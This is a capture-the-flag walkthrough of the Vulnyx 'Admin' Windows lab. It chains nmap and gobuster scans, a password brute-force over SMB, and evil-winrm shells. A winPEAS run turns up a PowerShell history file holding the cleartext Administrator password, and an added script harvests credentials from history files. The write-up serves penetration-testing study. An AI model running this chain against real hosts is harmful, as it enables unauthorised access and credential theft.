Windows target; download from https://vulnyx.com/file/Admin.php.
The box is mainly an exercise in post-exploitation enumeration on Windows.
Port scan.
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 09:46 CST
Nmap scan report for 192.168.56.143
Host is up (0.00033s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:6F:32:A3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6f:32:a3 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-04T07:47:21
|_ start_date: N/A
|_clock-skew: 6h00m02s
No LDAP, so this is a standalone host rather than a domain controller, but port 80 is open. Directory brute-forcing turns up a single txt file: the three gobuster hits below are the same file, since IIS resolves paths case-insensitively.
gobuster dir -u "http://192.168.56.143/" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500 -o 80.log
/tasks.txt (Status: 200) [Size: 98]
/Tasks.txt (Status: 200) [Size: 98]
/TASKS.txt (Status: 200) [Size: 98]
The file is a to-do list that doubles as a hint ("Change password") and gives us the username hope.
└─$ curl http://$IP/tasks.txt
Pending tasks:
- Finish website
- Update OS
- Drink coffee
- Rest
- Change password
By hope
With a username in hand, brute-force the password over SMB with netexec (--ignore-pw-decoding skips rockyou entries that are not valid UTF-8).
└─$ netexec smb $IP -u hope -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.56.143 445 ADMIN [+] ADMIN\hope:loser
Check whether the account can use WinRM: netexec reports Pwn3d!, so it can.
└─$ netexec winrm $IP -u hope -p loser
WINRM 192.168.56.143 5985 ADMIN [*] Windows 10 / Server 2019 Build 19041 (name:ADMIN) (domain:ADMIN)
WINRM 192.168.56.143 5985 ADMIN [+] ADMIN\hope:loser (Pwn3d!)
evil-winrm gives a shell as hope, from which the user flag can be collected.
└─$ evil-winrm -i $IP -u hope -p loser
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hope\Documents> whoami
admin\hope
Upload winPEAS and run it for local enumeration. Two things stand out in the PowerShell section: no script block, module or transcription logging is configured, and the PSReadLine history file for hope is present and non-empty.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 234B
The history file holds a single command, and it contains the Administrator password in cleartext: PSReadLine records every interactive command line as typed, so the -AsPlainText secret was written to disk along with it.
*Evil-WinRM* PS C:\Users\hope\Documents> type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString "SuperAdministrator123" -AsPlainText -Force)
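The two winPEAS findings above (no PowerShell logging policy, a readable PSReadLine history file) can be reproduced by hand from the evil-winrm session. The script below is an added example, not code from the original writeup or from winPEAS: it reads the PowerShell logging policy keys, then scans every profile's ConsoleHost_history.txt for lines that look like they carry credentials. The credential regex and the assumption that other users' AppData directories are readable are mine; on this box hope can only read its own profile, which is enough.

```powershell
# Added example (not from the original writeup or from winPEAS).
# Run inside the evil-winrm session on Windows PowerShell 5.1.

# 1. PowerShell logging policy. An absent value means the control is not enforced,
#    which matches the empty Transcription/Module/Scriptblock lines winPEAS printed.
$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$checks = @{
    'ScriptBlockLogging' = 'EnableScriptBlockLogging'
    'ModuleLogging'      = 'EnableModuleLogging'
    'Transcription'      = 'EnableTranscripting'
}
foreach ($key in $checks.Keys) {
    $name  = $checks[$key]
    $entry = Get-ItemProperty -Path "$policyRoot\$key" -Name $name -ErrorAction SilentlyContinue
    if ($null -eq $entry) {
        "[-] $key : not configured"
    } else {
        "[+] $key : $name = $($entry.$name)"
    }
}

# 2. PSReadLine history. The default per-user path is written by the console host
#    independently of the policy above, so it persists even when nothing else is logged.
#    Regex is an assumption: broad on purpose, tune it to the target.
$credentialRegex = 'ConvertTo-SecureString|Set-LocalUser|New-LocalUser|Set-ADAccountPassword|net(\.exe)?\s+user|-Password|-Credential|passw|secret|token|apikey'
$historyGlob = 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

Get-ChildItem -Path $historyGlob -ErrorAction SilentlyContinue | ForEach-Object {
    "[*] $($_.FullName) ($($_.Length) bytes)"
    # Select-String is case-insensitive by default; LineNumber/Line come from the MatchInfo object.
    Get-Content -Path $_.FullName -ErrorAction SilentlyContinue |
        Select-String -Pattern $credentialRegex |
        ForEach-Object { "    [!] line $($_.LineNumber): $($_.Line)" }
}

# 3. Defender's side: either of these in $PROFILE keeps typed secrets off disk.
#    PSReadLine 2.1 and later ship a default AddToHistoryHandler that already skips lines
#    containing password, asplaintext, token, apikey or secret; the 2.0.0 that ships with
#    this Windows build does not, which is why the Set-LocalUser line above was saved.
# Set-PSReadLineOption -HistorySaveStyle SaveNothing
# Set-PSReadLineOption -AddToHistoryHandler { param($line) $line -notmatch 'password|asplaintext|token|apikey|secret' }
```

A non-default history location set with Set-PSReadLineOption -HistorySavePath would not be caught by the glob; if the default path is empty, check the user's $PROFILE scripts for that option before concluding there is no history.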
Log in as administrator with the recovered password to get the root flag.
└─$ evil-winrm -i $IP -u administrator -p SuperAdministrator123
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator